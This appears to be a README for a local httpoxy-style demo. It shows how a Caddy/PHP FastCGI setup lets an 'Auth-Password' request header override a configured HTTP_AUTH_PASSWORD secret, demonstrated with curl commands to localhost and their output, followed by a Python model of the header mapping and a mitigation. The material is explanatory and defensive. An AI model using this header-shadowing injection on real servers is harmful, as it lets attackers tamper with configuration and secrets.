A simple example of the httpoxy exploit. This example uses HTTP_AUTH_PASSWORD instead of HTTP_PROXY because PHP blacklisted the latter.
- Install Caddy.
- Install PHP and start php-fpm on port 9000.
- Copy Caddyfile and index.php from this example into a directory.
- Start Caddy: just type caddy in the directory from the last step.
If you run curl localhost:8080, the server will output the value of HTTP_AUTH_PASSWORD that we set in the Caddyfile. If you pass the Auth-Password header, it will override the environment variable: the FastCGI gateway turns the request header into the HTTP_AUTH_PASSWORD meta-variable, which shadows the configured value.
» curl localhost:8080
string(9) "secret123"
» curl -H 'Auth-Password: hunter2' localhost:8080
string(7) "hunter2"
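The header-to-environment mapping behind this demo, as an added example that is not part of the original project (the Caddyfile and index.php are not reproduced here): it models how a CGI/FastCGI gateway derives HTTP_* meta-variables from request headers (RFC 3875) and shows a gateway-side check that drops any header which would shadow an operator-configured variable. The configured value and header values are constructed sample data.

```python
from typing import Dict, List, Tuple

# Constructed sample configuration, standing in for the demo's Caddyfile env.
CONFIGURED_ENV = {"HTTP_AUTH_PASSWORD": "secret123"}


def header_to_meta_variable(header_name: str) -> str:
    """RFC 3875 section 4.1.18: the gateway upper-cases the header name,
    replaces '-' with '_' and prefixes HTTP_, so the request header
    'Auth-Password' becomes the meta-variable 'HTTP_AUTH_PASSWORD'."""
    return "HTTP_" + header_name.strip().upper().replace("-", "_")


def build_cgi_env(headers: Dict[str, str], configured_env: Dict[str, str],
                  strip_shadowing: bool) -> Tuple[Dict[str, str], List[str]]:
    """Simulate the environment the gateway hands to php-fpm.

    strip_shadowing=False reproduces the httpoxy behaviour: a meta-variable
    derived from a request header overwrites a configured variable of the
    same name.  strip_shadowing=True is the mitigation: colliding headers are
    dropped (and reported) instead of being passed to the application.
    The robust fix is still to never store secrets under HTTP_* names."""
    env = dict(configured_env)
    dropped: List[str] = []
    for name, value in headers.items():
        meta = header_to_meta_variable(name)
        if strip_shadowing and meta in configured_env:
            dropped.append(name)
            continue
        env[meta] = value
    return env, dropped


def demo() -> Tuple[str, str, List[str]]:
    """Run the demo's two requests through both gateway behaviours.

    Returns (value seen by the vulnerable gateway, value seen by the
    hardened gateway, headers the hardened gateway dropped)."""
    headers = {"Host": "localhost:8080", "Auth-Password": "hunter2"}
    vulnerable, _ = build_cgi_env(headers, CONFIGURED_ENV, strip_shadowing=False)
    hardened, dropped = build_cgi_env(headers, CONFIGURED_ENV, strip_shadowing=True)
    return vulnerable["HTTP_AUTH_PASSWORD"], hardened["HTTP_AUTH_PASSWORD"], dropped


if __name__ == "__main__":
    print(demo())  # ('hunter2', 'secret123', ['Auth-Password'])
```

The same collision check explains the HTTP_PROXY case mentioned above: a Proxy request header maps to HTTP_PROXY, which is why gateways and runtimes now refuse that header.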